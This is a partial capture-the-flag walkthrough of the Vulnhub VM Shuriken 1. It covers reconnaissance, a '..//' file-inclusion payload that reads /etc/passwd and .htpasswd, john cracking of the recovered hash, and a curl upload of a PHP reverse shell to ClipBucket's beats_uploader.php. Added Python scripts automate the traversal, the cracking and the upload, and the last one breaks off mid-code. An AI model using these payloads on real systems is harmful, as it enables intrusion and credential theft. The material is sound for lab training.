
Vulnhub: Shuriken 1 Walkthrough (Partial)

Shuriken 1

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.163.0/16   |   Screen View: Unique Hosts                                                       
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:1b:5b:15      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.238  08:00:27:08:ec:f1      1      60  PCS Systemtechnik GmbH      

Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.238. As is usual on a VirtualBox host-only network, the other two entries are the host's adapter (.1) and VirtualBox's DHCP server (.100).

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.238 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-29 06:10 EST
Nmap scan report for bogon (192.168.56.238)
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE    SERVICE    VERSION
80/tcp   open     http       Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Shuriken
|_http-server-header: Apache/2.4.29 (Ubuntu)
8080/tcp filtered http-proxy
MAC Address: 08:00:27:08:EC:F1 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.17 seconds

The NMAP scan shows that the target has one open port, 80 (HTTP). Port 8080 is reported as filtered (no response at all) rather than closed.

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ nikto -h http://192.168.56.238                                                                       
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.238
+ Target Hostname:    192.168.56.238
+ Target Port:        80
+ Start Time:         2022-11-29 06:16:18 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /secret/: Directory indexing found.
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ 7916 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2022-11-29 06:17:09 (GMT-5) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

This reveals /secret/ (with directory indexing enabled) and /login.html.

┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ curl http://192.168.56.238/secret/      
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /secret</title>
 </head>
 <body>
<h1>Index of /secret</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="secret.png">secret.png</a></td><td align="right">2020-10-04 16:55  </td><td align="right">202K</td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.238 Port 80</address>
</body></html>

Download the image to the local Kali Linux machine:

┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ wget http://192.168.56.238/secret/secret.png
--2022-11-29 06:19:14--  http://192.168.56.238/secret/secret.png
Connecting to 192.168.56.238:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207283 (202K) [image/png]
Saving to: ‘secret.png’

secret.png                      100%[====================================================>] 202.42K  --.-KB/s    in 0.002s  

2022-11-29 06:19:14 (79.3 MB/s) - ‘secret.png’ saved [207283/207283]

                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ ls
nmap_full_scan  secret.png
                                    

Scan for any other directories or files:

┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ gobuster dir -u http://192.168.56.238 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.238
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/29 06:20:58 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.238/img/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.238/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.238/js/]
/secret               (Status: 301) [Size: 317] [--> http://192.168.56.238/secret/]
/server-status        (Status: 403) [Size: 279]
Progress: 217532 / 220561 (98.63%)
===============================================================
2022/11/29 06:21:28 Finished

No more useful directories turned up. The text in the /secret/secret.png image reads "javascript", which is the author's hint that the way in is through the JavaScript. Looking closely at the homepage index.php, it loads two JS files:


	<script src="/js/index__7ed54732.js"></script>
	<script src="/js/index__d8338055.js"></script>

Paste the first one into an online JS formatter, which makes it much easier to read:

https://www.qianbo.com.cn/Tool/Beautify/Js-Formatter.html

After formatting, the JS code reads:

! function(a, e) {
	for (var t in e) a[t] = e[t]
}(window, function(a) {
	var e = {};

	function t(n) {
		if (e[n]) return e[n].exports;
		var s = e[n] = {
			i: n,
			l: !1,
			exports: {}
		};
		return a[n].call(s.exports, s, s.exports, t), s.l = !0, s.exports
	}
	return t.m = a, t.c = e, t.d = function(a, e, n) {
		t.o(a, e) || Object.defineProperty(a, e, {
			enumerable: !0,
			get: n
		})
	}, t.r = function(a) {
		"undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(a, Symbol.toStringTag, {
			value: "Module"
		}), Object.defineProperty(a, "__esModule", {
			value: !0
		})
	}, t.t = function(a, e) {
		if (1 & e && (a = t(a)), 8 & e) return a;
		if (4 & e && "object" == typeof a && a && a.__esModule) return a;
		var n = Object.create(null);
		if (t.r(n), Object.defineProperty(n, "default", {
			enumerable: !0,
			value: a
		}), 2 & e && "string" != typeof a)
			for (var s in a) t.d(n, s, function(e) {
				return a[e]
			}.bind(null, s));
		return n
	}, t.n = function(a) {
		var e = a && a.__esModule ? function() {
			return a.default
		} : function() {
			return a
		};
		return t.d(e, "a", e), e
	}, t.o = function(a, e) {
		return Object.prototype.hasOwnProperty.call(a, e)
	}, t.p = "http://broadcast.shuriken.local", t(t.s = 0)
}({
	0: function(a, e, t) {
		a.exports = t("WdQY")
	},
	WdQY: function(a, e, t) {
		"use strict";

		function n(a, e, t) {
			return e in a ? Object.defineProperty(a, e, {
				value: t,
				enumerable: !0,
				configurable: !0,
				writable: !0
			}) : a[e] = t, a
		}
		t.r(e);
		var s = t("kiQV");

		function l(a) {
			var e = a.host,
				t = a.chatAlias,
				n = a.callbackAlias,
				s = a.lang;
			return fetch(function(a) {
					var e = a.host,
						t = a.chatAlias,
						n = void 0 === t ? "" : t,
						s = a.callbackAlias,
						l = void 0 === s ? "" : s,
						i = a.lang,
						c = void 0 === i ? "pl-PL" : i;
					return "".concat(void 0 === e ? "http://broadcast.shuriken.local" : e)
						.concat("/", "?_alias=")
						.concat(n, "&_callbackAlias=")
						.concat(l, "&_lang=")
						.concat(c)
				}({
					host: e,
					chatAlias: t,
					callbackAlias: n,
					lang: s
				}))
				.then((function(a) {
					return a.json()
				}))
				.then((function(a) {
					return {
						chatAgentsAvailable: a.agents > 0,
						callbackAsapAgentsAvailable: a.callbackAsapAgentsAvailable > 0,
						callbackScheduleAgentsAvailable: a.callbackScheduleAgentsAvailable > 0
					}
				}))
		}
		t.d(e, "INTERVAL_TIME", (function() {
			return i
		})), t.d(e, "default", (function() {
			return r
		}));
		var i = 5e3,
			c = function() {},
			r = function a() {
				var e = this;
				! function(a, e) {
					if (!(a instanceof e)) throw new TypeError("Cannot call a class as a function")
				}(this, a), n(this, "clearInterval", (function() {
					e.agentsAvailabilityCheckInterval && (clearInterval(e.agentsAvailabilityCheckInterval), e.agentsAvailabilityCheckInterval = null)
				})), n(this, "checkAgentsAvailability", (function() {
					l({
							host: e.host,
							chatAlias: e.chatAlias,
							callbackAlias: e.callbackAlias,
							lang: e.lang
						})
						.then(e.updateAgentsStatus)
				})), n(this, "startAgentsAvailabilityChecker", (function(a) {
					var t = a.host,
						n = a.chatAlias,
						s = a.callbackAlias,
						c = a.lang,
						r = void 0 === c ? "pl-PL" : c;
					e.callbackAlias = s, e.chatAlias = n, e.host = t, e.lang = r, e.clearInterval(), l({
							host: t,
							chatAlias: n,
							callbackAlias: s,
							lang: r
						})
						.then(e.updateAgentsStatus), e.agentsAvailabilityCheckInterval = setInterval(e.checkAgentsAvailability, i)
				})), n(this, "registerFunctions", (function(a) {
					var t = a.startGenesysSession,
						n = void 0 === t ? e.startGenesysSession : t,
						s = a.endGenesysSession,
						l = void 0 === s ? e.endGenesysSession : s;
					e.startGenesysSession = n, e.endGenesysSession = l
				})), n(this, "startChatSession", (function() {
					e.startGenesysSession(), e.chatInProgress = !0
				})), n(this, "updateMedaliaScenario", (function(a) {
					e.medaliaScenario = a
				})), n(this, "updateAgentsStatus", (function(a) {
					var t = a.chatAgentsAvailable,
						n = a.callbackAsapAgentsAvailable,
						s = a.callbackScheduleAgentsAvailable;
					e.chatAgentsAvailable = t, e.callbackAsapAgentsAvailable = n, e.callbackScheduleAgentsAvailable = s
				})), n(this, "quitChatSession", (function() {
					e.endGenesysSession(), e.chatInProgress = !1
				})), this.agentsAvailabilityCheckInterval = null, this.callbackAlias = "", this.callbackAsapAgentsAvailable = !1, this.callbackScheduleAgentsAvailable = !1, this.chatAgentsAvailable = !1, this.chatAlias = "", this.chatInProgress = !1, this.endGenesysSession = c, this.host = "", this.lang = "pl-PL", this.medaliaScenario = "", this.startGenesysSession = c
			};
		window.opbox.services.register({
			serviceName: s.a
		}, r)
	},
	kiQV: function(a) {
		a.exports = JSON.parse('{"a":"opbox-customer-chat-service"}')
	}
}));
//# sourceMappingURL=index_7ed54732.js.map

This reveals a hostname: broadcast.shuriken.local. It appears twice in the bundle, as the webpack public path (t.p = "http://broadcast.shuriken.local") and as the default host fallback inside the fetch URL builder.

Add it to the /etc/hosts file:

┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ sudo vim /etc/hosts                                        
[sudo] password for kali: 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ cat /etc/hosts                    
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.238  broadcast.shuriken.local

Visiting http://broadcast.shuriken.local pops up a username/password prompt: the virtual host is protected by HTTP Basic authentication.

Inspecting the other JS file (index__d8338055.js) reveals a URL:

http://shuriken.local/index.php?referer=
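Automating the two inspections above (the t.p public path in the first bundle and the referer URL in the second) takes a few lines of Python. The block below is an added example, not part of the original write-up: it reads the script tags out of an index page, pulls every absolute URL out of the JS bodies, reduces them to hostnames and prints the /etc/hosts lines. The HTML and JS snippets are constructed stand-ins for the real, minified files; only the script paths and the two host strings come from the page.

```python
import re
from urllib.parse import urlsplit

# Constructed stand-ins (added example): the real bundles are minified webpack
# output; only the script paths and the two host strings come from the page.
SAMPLE_INDEX_HTML = """<html><head>
    <script src="/js/index__7ed54732.js"></script>
    <script src="/js/index__d8338055.js"></script>
</head><body>Shuriken</body></html>"""

SAMPLE_JS = {
    "/js/index__7ed54732.js": 't.p="http://broadcast.shuriken.local",t(t.s=0)}({',
    "/js/index__d8338055.js": 'var u="http://shuriken.local/index.php?referer=";',
}

SCRIPT_SRC_RE = re.compile(r"""<script[^>]*\ssrc=["']([^"']+)["']""", re.IGNORECASE)
# Absolute http(s) URLs; stops at quotes, whitespace and the usual delimiters.
URL_RE = re.compile(r"""https?://[A-Za-z0-9.-]+(?::\d+)?(?:/[^\s"'<>)]*)?""")


def script_sources(html: str) -> list:
    """Return the src attribute of every <script> tag, in document order."""
    return SCRIPT_SRC_RE.findall(html)


def extract_urls(js: str) -> list:
    """Absolute URLs embedded in a JS body, deduplicated, first-seen order."""
    seen = []
    for url in URL_RE.findall(js):
        if url not in seen:
            seen.append(url)
    return seen


def discover_hosts(js_bodies) -> list:
    """Distinct hostnames referenced by the JS bodies, skipping bare IPs."""
    hosts = []
    for js in js_bodies:
        for url in extract_urls(js):
            host = urlsplit(url).hostname
            if host and not re.fullmatch(r"[\d.]+", host) and host not in hosts:
                hosts.append(host)
    return hosts


def hosts_file_lines(ip: str, hosts) -> list:
    """Lines to append to /etc/hosts so the virtual hosts resolve to the target."""
    return [f"{ip}\t{host}" for host in hosts]


if __name__ == "__main__":
    for src in script_sources(SAMPLE_INDEX_HTML):
        print("script:", src)
    for line in hosts_file_lines("192.168.56.238", discover_hosts(SAMPLE_JS.values())):
        print(line)
```

Against the constructed snippets this yields both virtual hosts, broadcast.shuriken.local and shuriken.local, which is one more than the /etc/hosts listing above contains.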

Visiting that URL (shuriken.local must also be added to /etc/hosts pointing at 192.168.56.238; only broadcast.shuriken.local was added above) shows what looks like a file inclusion. Unlike the usual local file inclusion, plain ../ sequences do not work here; each traversal step needs a doubled slash, ..//:

view-source:http://shuriken.local/index.php?referer=..//..//..//..//etc/passwd

This returns the contents of /etc/passwd, embedded in the page source (hence view-source):

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
lightdm:x:106:113:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:107:117::/nonexistent:/bin/false
kernoops:x:108:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
pulse:x:109:119:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:110:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
server-management:x:1000:1000:server-management,,,:/home/server-management:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
mysql:x:112:123:MySQL Server,,,:/nonexistent:/bin/false
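The traversal itself is easy to script. The block below is an added example, not code from the write-up: it builds the ..// payload for any path, shows why the doubled slash typically survives a filter that strips ../ in a single pass (the page never shows index.php's source, so that filter is a guess at the mechanism, not the box's real code), contrasts it with the realpath containment check a hardened include should use, and triages the returned passwd for accounts with a real login shell. The passwd excerpt is a subset of the output above; the endpoint and traversal depth are taken from the page.

```python
import os
import urllib.parse
import urllib.request

# Taken from the page: the vulnerable endpoint and the depth that reached /.
TARGET = "http://shuriken.local/index.php"
NO_SHELL = {"/usr/sbin/nologin", "/bin/false", "/bin/sync"}

# Excerpt of the /etc/passwd the page recovered (constructed subset).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
lightdm:x:106:113:Light Display Manager:/var/lib/lightdm:/bin/false
server-management:x:1000:1000:server-management,,,:/home/server-management:/bin/bash
mysql:x:112:123:MySQL Server,,,:/nonexistent:/bin/false
"""


def traversal_payload(path: str, depth: int = 4, step: str = "..//") -> str:
    """'/etc/passwd' -> '..//..//..//..//etc/passwd' (the form the page used)."""
    return step * depth + path.lstrip("/")


def lfi_url(path: str, depth: int = 4) -> str:
    """Full request URL; '.' and '/' stay unencoded so the filter sees them."""
    payload = urllib.parse.quote(traversal_payload(path, depth), safe="/")
    return TARGET + "?referer=" + payload


def naive_strip(user_input: str) -> str:
    """Hypothetical filter (an assumption, not the box's code): drop '../' once.
    '../../etc/passwd'   -> 'etc/passwd'   relative, the include fails
    '..//..//etc/passwd' -> '//etc/passwd' still absolute, the include works"""
    return user_input.replace("../", "")


def is_within(base: str, user_input: str) -> bool:
    """Hardened form: resolve the final path and require it to stay under base."""
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, user_input))
    return os.path.commonpath([base_real, target]) == base_real


def interactive_accounts(passwd_text: str) -> list:
    """Users whose login shell is real, the ones worth pivoting to.
    Only 7-field lines count, so the HTML around an included file is ignored."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[6] not in NO_SHELL:
            users.append(fields[0])
    return users


def fetch_via_lfi(path: str, depth: int = 4) -> str:
    """Live request (not run by the tests); needs shuriken.local in /etc/hosts."""
    with urllib.request.urlopen(lfi_url(path, depth), timeout=10) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    print(lfi_url("/etc/passwd"))
    print(interactive_accounts(SAMPLE_PASSWD))
```

On the excerpt, interactive_accounts returns root and server-management, which is exactly the short list a privilege-escalation phase starts from.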

The HTTP Basic authentication credentials live in the .htpasswd file, so keep using the local file inclusion, here with the doubled slash applied to every separator:

http://shuriken.local/index.php?referer=..//..//..//..//..//..//etc//apache2//.htpasswd

The source of the returned page contains the .htpasswd entry, an Apache $apr1$ (MD5-based) hash:

developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0

Crack it with john (it auto-detects the format as md5crypt, which covers the $apr1$ variant):

┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ echo 'developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0' > hashes
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
9972761drmfsls   (developers)     
1g 0:00:00:09 DONE (2022-11-29 06:54) 0.1013g/s 218961p/s 218961c/s 218961C/s 9982..99686420
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
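What john is doing here can be reproduced offline, which is also the quickest way to confirm a cracked credential before using it. The block below is an added example, not the write-up's code: it implements Apache's $apr1$ scheme (what htpasswd -m writes: MD5-crypt with a different magic string) and runs a small constructed candidate list against the .htpasswd line recovered above. The hash and username are the page's; the candidate list is made up.

```python
import hashlib
import hmac

# The .htpasswd line recovered through the LFI (from the page), plus a small
# constructed candidate list standing in for a wordlist.
HTPASSWD_LINE = "developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0"
CANDIDATES = ["password", "developers", "shuriken", "9972761drmfsls", "admin123"]

MAGIC = b"$apr1$"
ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> bytes:
    """crypt(3)-style base64: 6 bits per character, least significant first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def apr1_crypt(password: bytes, salt: bytes) -> str:
    """Apache's $apr1$ scheme (htpasswd -m): MD5-crypt with the '$apr1$' magic."""
    salt = salt[:8]
    ctx = hashlib.md5(password + MAGIC + salt)
    alt = hashlib.md5(password + salt + password).digest()
    # Mix in the alternate digest, 16 bytes per 16 bytes of password length.
    remaining = len(password)
    while remaining > 0:
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    # For each bit of the length: a NUL for a 1 bit, the first password byte for 0.
    bits = len(password)
    while bits > 0:
        ctx.update(b"\x00" if bits & 1 else password[:1])
        bits >>= 1
    final = ctx.digest()
    # 1000 stretching rounds mixing password, salt and digest in varying order.
    for i in range(1000):
        rnd = hashlib.md5(password if i & 1 else final)
        if i % 3:
            rnd.update(salt)
        if i % 7:
            rnd.update(password)
        rnd.update(final if i & 1 else password)
        final = rnd.digest()
    # Digest bytes are emitted in a transposed order, 3 bytes per 4 characters.
    encoded = b"".join([
        _to64((final[0] << 16) | (final[6] << 8) | final[12], 4),
        _to64((final[1] << 16) | (final[7] << 8) | final[13], 4),
        _to64((final[2] << 16) | (final[8] << 8) | final[14], 4),
        _to64((final[3] << 16) | (final[9] << 8) | final[15], 4),
        _to64((final[4] << 16) | (final[10] << 8) | final[5], 4),
        _to64(final[11], 2),
    ])
    return (MAGIC + salt + b"$" + encoded).decode()


def verify_apr1(password: str, stored: str) -> bool:
    """True when password hashes to the stored '$apr1$<salt>$<hash>' string."""
    if not stored.startswith("$apr1$"):
        raise ValueError("not an $apr1$ hash: " + stored)
    salt = stored.split("$")[2]
    computed = apr1_crypt(password.encode(), salt.encode())
    return hmac.compare_digest(computed, stored)


def crack(htpasswd_line: str, candidates):
    """Return the first candidate that matches the line's hash, or None."""
    _user, stored = htpasswd_line.strip().split(":", 1)
    for candidate in candidates:
        if verify_apr1(candidate, stored):
            return candidate
    return None


if __name__ == "__main__":
    print(crack(HTPASSWD_LINE, CANDIDATES))
```

The 1000 MD5 rounds are the only work factor this scheme has, which is why rockyou.txt falls through it at over 200,000 candidates per second on two threads; bcrypt (htpasswd -B) is the setting to use instead.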

These credentials get through the HTTP Basic authentication. Once logged in, the target can be seen to be running ClipBucket.

Look up known vulnerabilities for it:

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ searchsploit clipbucket             
-------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                              |  Path
-------------------------------------------------------------------------------------------- ---------------------------------
ClipBucket - 'beats_uploader' Arbitrary File Upload (Metasploit)                            | php/webapps/44346.rb
Clipbucket 1.7 - 'dwnld.php' Directory Traversal                                            | php/webapps/32802.txt
Clipbucket 1.7.1 - Multiple SQL Injections                                                  | php/webapps/34694.txt
Clipbucket 2.4 RC2 645 - SQL Injection                                                      | php/webapps/17325.py
Clipbucket 2.5 - Blind SQL Injection                                                        | php/webapps/20708.txt
Clipbucket 2.5 - Cross-Site Request Forgery                                                 | php/webapps/20666.html
Clipbucket 2.5 - Directory Traversal                                                        | php/webapps/20704.txt
Clipbucket 2.6 - 'channels.php?cat' Cross-Site Scripting                                    | php/webapps/36524.txt
Clipbucket 2.6 - 'channels.php?time' SQL Injection                                          | php/webapps/36532.txt
Clipbucket 2.6 - 'collections.php?cat' Cross-Site Scripting                                 | php/webapps/36525.txt
Clipbucket 2.6 - 'groups.php?cat' Cross-Site Scripting                                      | php/webapps/36526.txt
Clipbucket 2.6 - 'search_result.php?query' Cross-Site Scripting                             | php/webapps/36527.txt
Clipbucket 2.6 - 'videos.php?cat' Cross-Site Scripting                                      | php/webapps/36528.txt
Clipbucket 2.6 - 'videos.php?time' SQL Injection                                            | php/webapps/36531.txt
Clipbucket 2.6 - 'view_collection.php?type' Cross-Site Scripting                            | php/webapps/36529.txt
Clipbucket 2.6 - 'view_item.php?type' Cross-Site Scripting                                  | php/webapps/36530.txt
Clipbucket 2.6 - Multiple Vulnerabilities                                                   | php/webapps/18341.txt
Clipbucket 2.6 Revision 738 - Multiple SQL Injections                                       | php/webapps/23252.txt
Clipbucket 2.7 RC3 0.9 - Blind SQL Injection                                                | php/webapps/36156.txt
ClipBucket 2.8 - 'id' SQL Injection                                                         | php/webapps/45688.txt
ClipBucket 2.8.3 - Multiple Vulnerabilities                                                 | php/webapps/42457.txt
ClipBucket 2.8.3 - Remote Code Execution                                                    | php/webapps/42954.py
ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection         | php/webapps/44250.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ searchsploit -m php/webapps/44250.txt
  Exploit: ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection
      URL: https://www.exploit-db.com/exploits/44250
     Path: /usr/share/exploitdb/exploits/php/webapps/44250.txt
File Type: ASCII text

Copied to: /home/kali/Vulnhub/Shuriken_1/44250.txt


Use the arbitrary file upload from 44250 to push a PHP reverse shell to the target. The actions/beats_uploader.php endpoint (reached with the Basic auth credentials cracked above) stores whatever is sent and reports the extension back unchanged, as the "extension":"php" in the JSON reply shows. A netcat listener on port 5555 catches the connection:

┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ curl -F "file=@rshell.php" -F "plupload=1" -F "name=rshell.php" \
"http://broadcast.shuriken.local/actions/beats_uploader.php" -u developers:9972761drmfsls
creating file{"success":"yes","file_name":"1669723866241fca","extension":"php","file_directory":"CB_BEATS_UPLOAD_DIR"}
http://broadcast.shuriken.local/actions/CB_BEATS_UPLOAD_DIR/
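The same upload done from a script, so that the uploader's reply can be parsed instead of read by eye. This is an added example, not the write-up's own command: it hand-builds the multipart body that curl's -F flags produce, sends it with Basic auth, and turns the JSON reply into the stored file's URL. The endpoint, credentials and reply text are the page's; the layout actions/<file_directory>/<file_name>.<extension> is an assumption about how ClipBucket stores the upload, inferred from the reply and the directory the page visits next, and the PHP body is a harmless placeholder rather than a shell.

```python
import base64
import json
import uuid
import urllib.request

# Taken from the page: target, endpoint and the cracked Basic auth credentials.
BASE = "http://broadcast.shuriken.local"
ENDPOINT = BASE + "/actions/beats_uploader.php"
CREDS = ("developers", "9972761drmfsls")

# The reply the page shows for its upload (note the text before the JSON).
PAGE_RESPONSE = ('creating file{"success":"yes","file_name":"1669723866241fca",'
                 '"extension":"php","file_directory":"CB_BEATS_UPLOAD_DIR"}')


def multipart_body(fields: dict, filename: str, content: bytes, boundary: str) -> bytes:
    """Hand-built multipart/form-data, equivalent to curl's -F flags above."""
    parts = []
    for name, value in fields.items():
        parts.append(
            f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'.encode())
    parts.append(
        f'--{boundary}\r\nContent-Disposition: form-data; name="file"; filename="{filename}"\r\n'
        f"Content-Type: application/octet-stream\r\n\r\n".encode() + content + b"\r\n")
    parts.append(f"--{boundary}--\r\n".encode())
    return b"".join(parts)


def stored_path(response_text: str) -> str:
    """Path of the stored file, derived from the uploader's JSON reply.
    actions/<file_directory>/<file_name>.<extension> is an assumption about
    ClipBucket's layout, not something the page states explicitly."""
    start = response_text.find("{")
    if start < 0:
        raise RuntimeError("no JSON in reply: " + response_text)
    info = json.loads(response_text[start:])
    if info.get("success") != "yes":
        raise RuntimeError("upload rejected: " + response_text[start:])
    return f"/actions/{info['file_directory']}/{info['file_name']}.{info['extension']}"


def upload(filename: str, content: bytes, user: str, password: str) -> str:
    """Live upload (not run by the tests); returns the URL of the stored file."""
    boundary = "----boundary" + uuid.uuid4().hex
    body = multipart_body({"plupload": "1", "name": filename}, filename, content, boundary)
    req = urllib.request.Request(ENDPOINT, data=body, method="POST")
    req.add_header("Content-Type", f"multipart/form-data; boundary={boundary}")
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    with urllib.request.urlopen(req, timeout=15) as resp:
        return BASE + stored_path(resp.read().decode(errors="replace"))


if __name__ == "__main__":
    # Placeholder body, deliberately not a shell: it only proves PHP executes.
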